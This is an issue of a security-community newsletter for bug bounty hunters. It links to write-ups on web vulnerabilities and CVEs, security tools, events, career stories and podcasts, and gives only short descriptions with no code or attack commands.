🐝 Hive Five 129 - I miss the old internet

Hi friends,

Greetings from the hive!

Happy belated 4th of July. This new internet got me in my feelings.

This time, TweetDeck has been “improved” and will move behind a paywall. This also means that one of my favorite Chrome extensions, BetterTweetDeck, is no more.

Let’s take this week by swarm!

🐝 The Bee’s Knees 

1. Live web app hacking using Caido with it’s co-founder sytten. Caido is a lightweight web security auditing toolkit. more 

2. A hacker interview with Ryan Montgomery aka 0day. more

3. Full Disclosure - DOM-based XSS And Failures In Bug Bounty Hunting. Kuldeep shares a bug bounty failure and 3 actionable takeaways. more 

4. Hunting for Nginx Alias Traversals in the wild. This article delves into the intricacies of Nginx, focusing on the location and alias directives that are central to how Nginx handles specific URLs. more

5. Patch Diffing CVE-2023-28121 to Compromise a WooCommerce. Back in March 2023, Julien noticed an interesting security advisory that was published by Wordfence about a critical “Authentication Bypass and Privilege Escalation” (aka CVE-2023-28121) affecting the “WooCommerce Payments” plugin which has more than 600. more

️💪 Sponsor

Sponsor the Hive Five and reach a highly engaged community of engineers, security researchers, and ethical hackers who are at the forefront of the industry.

🔥 Buzzworthy

✅ Changelog

1. TweetDeck has been “improved” and will be a paid feature. more

2. j3ssie/osmedeus v4.5.0 is a workflow engine for offensive security. more

3. j3ssie/metabigor v1.2.5 is an OSINT tools and more but without API keys. more

4. For Kali Linux, pip install is on the way out. Installing Python packages must be done via APT, aka. Kali Linux’s package manager. Python packages coming from other sources should be installed in virtual environments. more

📅 Events

1. NahamSec is thinking about hosting a bug bounty meet up at Defcon with Jason and STÖK. more

2. STÖK, Dylan, and Jesper broke stuff for science using…Uranium?! I look forward to seeing the full story. more

3. Paul started his own company, Coastline Cyber. A boutique cyber security consulting firm. more

4. People loved Jason’s first live course. The next Bug Hunter’s Methodology takes place this weekend. more

5. FIRST.org (CVSS) removed the previously celebrated self-service provisioned accounts statement to many bug bounty hunters dismay. more | follow-up

🎉 Celebrate

1. Kuldeep was recognized as an SRT Hero and member of the Circle of Trust. Let’s go! more

2. ninetynine was invited to their first Live Hacking Event in Las Vegas no less. Good luck! more

3. Jane joined Meta to work on Threads. I can’t wait to see your influence! more

4. Ian left his job at Robinhood to work on Seats Aero full-time. Awesome! more

💰 Career

1. TIL there are severance package hunters. more

2. Corgi shared her fast food history with a surprising twist: Operation Big Mis-Steak. more

3. Renniepak shares his struggles with taking time off while being self-employed. more

4. Fletcher, the CIO of Cisco, shares his journey in the tech industry, emphasizing the importance of passion and attitude in succeeding in the constantly changing field. more

5. Starting a new job? Here are four actionable tips for new hires which you can implement in your first 90 days. more

⚡️ Community

1. If Twitter falls, the OSINT community needs a new home, says fs0c131y — I’m also concerned with fragmentation and losing the overview. more

2. A discussion around getting maximizing bounty payouts vs proving that actual security vulnerabilities are worth paying for. more

3. A collection of InfoSec handles on Meta’s Twitter clone, Threads. more

4. What did you buy with your first bounty payout? more | source

5. It became public that a hacker accessed HackerOne email addresses in a recent disclosed report. more| discussion

📰 Read

1. A Journey Into Hacking Google Search Appliance. more

2. CVE-2023-36934 Analysis: MOVEit Transfer SQL Injection. the focus at ProjectDiscovery is on enhancing their open-source solution, Nuclei, by incorporating templates for trending CVEs. more

3. Exploiting XXE with local DTD files. This little technique can force your blind XXE to output anything you want. more

4. DNS Analyzer helps you find DNS vulnerabilities with Burp Suite. more | tool

5. Why ORMs and Prepared Statements Can’t (Always) Win. The Sonar Research team discovered several SQL injection vulnerabilities in Soko, a software deployed on the Gentoo Linux infrastructure. These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements. more

🙏 Support

Enjoy reading the Hive Five? You can treat me to a coffee!

You can also share the newsletter with your friends.

📚 Resources

1. A collection of public security research. more

2. A discussion around disclosing bug bounty reports reports and sharing methodologies. more

3. Whitecyberduck’s useful Cybersecurity Websites. more

4. Books that have significantly impacted how people do business. more

5. Sleuthcon 2023 videos have been posted. This conference is designed to highlight the work done by people and organizations to identify and explore cybercrime and financially-motivated cyber threats. more

🎥 Watch

1. JWT Authentication Bypass via jwk Header Injection. Learn about JSON Web Token (JWT) vulnerabilities. more

2. Top 3 bug bounty tips by NahamSec, who made $100K in 2 months. more

3. Generic HTML Sanitizer Bypass Investigation. LiveOverflow stumbled upon a weird HTML behavior on Twitter and started to investigate it. more

4. Ippsec takes on another HackTheBox box, Inject. more

5. Rana is back with Web Security Academy. This time she covers Authentication Vulnerabilities - Lab #1 Username enumeration via different responses. more

🎵 Listen

1. We Hack Purple Podcast 79 with Isabelle Mauny, where they discuss several of the challenges when creating secure APIs. more

2. Archwisp shared offline copies of all of the Defcon parties mixes and videos. more

3. Smashing Security 329: Pornhub, Barbie dolls, and can you trust a free TV? more

4. Critical Thinking - Bug Bounty Podcast Episode 26: Client-side Quirks & Browser Hacks. more

Get $200 to try DigitalOcean. Level up your bug bounty game with the ultimate VPS solution. It’s my go-to for all recon, automation, and even VPN needs. Get access to a comprehensive range of cloud resources, all at an affordable price.

Subscribe to the Hive Five to read the rest.